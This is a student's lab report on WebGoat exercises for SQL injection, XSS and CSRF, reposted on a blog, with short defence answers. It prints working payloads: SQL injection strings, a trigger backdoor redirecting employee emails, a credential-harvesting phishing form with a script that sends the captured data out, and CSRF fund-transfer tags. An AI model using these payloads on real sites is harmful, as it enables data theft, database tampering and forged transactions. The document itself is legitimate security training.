20145312 《网络对抗》 Web安全基础实践

20145312 《网络对抗》 Web安全基础实践

问题回答

  1. SQL注入攻击原理,如何防御
    原理:攻击者在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,把SQL语句当做用户名等输入正常网页中以获取数据库信息的攻击或对数据库增删查改的基本操作。
    防御:限制SQL字符串连接的配置文件;指定错误返回页面;替换或删除单引号;去除代码中的敏感信息;封装数据信息等。

  2. XSS攻击的原理,如何防御
    原理:恶意攻击者通过往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
    防御:对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。如果有时候不能过滤的话,就将敏感的字符进行替换,让代码失去本来的样子,在读取的时候在替换回来。

  3. CSRF攻击原理,如何防御
    原理:CSRF是跨站请求伪造,是一种对网站的恶意利用,通过伪装来自受信任用户的请求来利用受信任的网站。
    防范:通过验证码来检测用户提交,尽量不要在页面的链接中暴露用户隐私信息,对于用户修改删除等操作最好都使用post 操作 ,避免全站通用的cookie,严格设置cookie的域。

实验总结

这次实验进阶性的学习了SQL注入攻击、XSS攻击和CSRF攻击原理。我一共做了10个小实验。其中SQL注入攻击需要用到burpsuite做代理,于是我还熟悉了burpsuite的使用方法。还有,博客发迟了,请老师谅解。。

实践过程

实验前准备

  • 在在终端中输入java -jar webgoat-container-7.0.1-war-exec.jar开启webgoat,直到出现INFO: Starting ProtocolHandler ["http-bio-8080"],打开浏览器,在浏览器中输入localhost:8080/WebGoat进入webgoat
    885499-20170521154645338-56308906.png

SQL注入

Numeric SQL Injection
  • 这一步中用到了burpsuite做代理,将查找语句101后加上or 1=1
    885499-20170521154251994-985082057.png
  • 成功截图
    885499-20170521154526666-464018547.png
Log Spoofing
  • 登陆欺骗,通过在用户名中输入%0d%0aLogin succeeded !admin使用户看起来像登录成功,成功截图如下:
    885499-20170521154833494-1291553593.png
String SQL Injection
  • 通过输入查询的语句使得整张表得以显示,在其中输入' or 1=1;--
  • 此时注入的SQL语句为SELECT * FROM user_data WHERE last_name = '' or 1=1;--',即查询表中所有信息。成功截图如下:
    885499-20170521155209244-653058113.png
Stage 1 String SQL Injection
  • 在密码中输入' or 1=1 --,失败,发现密码只能输入8位
    885499-20170521164419385-1548688060.png

  • 于是可以改一下代码:
    885499-20170521164629557-1558358393.png

  • 成功截图如下:
    885499-20170521164727760-561593093.png

Database Backdoors
  • 通过输入101; update employee set salary=5312来给id为101的人改工资
    885499-20170521163244807-1449775044.png

  • 注入成功
    885499-20170521163403510-1135898880.png

  • 留一个后门,让所有新用户的邮箱都是我的,工资都邮到我的邮箱
101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='yuanxin@qq.com' WHERE userid = NEW.userid

885499-20170521163451416-1531907972.png

XSS攻击

CSRF(Cross Site Request Forgery)
  • 编写前端代码并在输入框中注入这段前端代码
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

885499-20170521155425541-706584420.png

  • 显示如下
    885499-20170521155916650-1996333917.png

  • 输入用户名和密码,提交即可截获
    885499-20170521155934103-1542020573.png

  • 成功截图如下
    885499-20170521160100447-418261329.png

Stored XSS Attacks 存储型XSS攻击
  • 在Message里输入
    885499-20170521160146510-772943789.png
  • Message List出现刚才的消息title
    885499-20170521160431416-1158620041.png

  • 点击弹出对话框
    885499-20170521160502307-1154346606.png
  • 成功截图如下:
    885499-20170521160537807-2138851670.png

Reflected XSS Attacks
  • 输入指定的URL值,这里的效果为弹出方框
http://www.targetserver.com/search.asp?input=<script>alert("hello20145312");</script>

885499-20170521160723869-1088602806.png

  • 成功截图如下:
    885499-20170521160828213-571647507.png

XSCF攻击

CSRF(Cross Site Request Forgery)
  • 在message里输入<img src='attack?Screen=276&menu=900&transferFunds=145312' width='1' height='1'>这其中,276是我网页的scr,900是我的网页的menu,145312是转钱数额。
    885499-20170521161113353-1131692358.png

  • 点击20145212,方才的代码就会被执行
    885499-20170521161615260-1555588713.png

CSRF Prompt By-Pass
  • 与上个实验类似,同样是通过邮件的方式进行恶意请求,这里添加了请求确认的要求,所以需要两个iframe模块,输入如下:
<iframe src="attack?Screen=276&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=276&menu=900&transferFunds=CONFIRM"> </iframe>
  • 成功截图如下:
    885499-20170521163827119-576617054.png

转载于:https://www.cnblogs.com/yx20145312/p/6885319.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值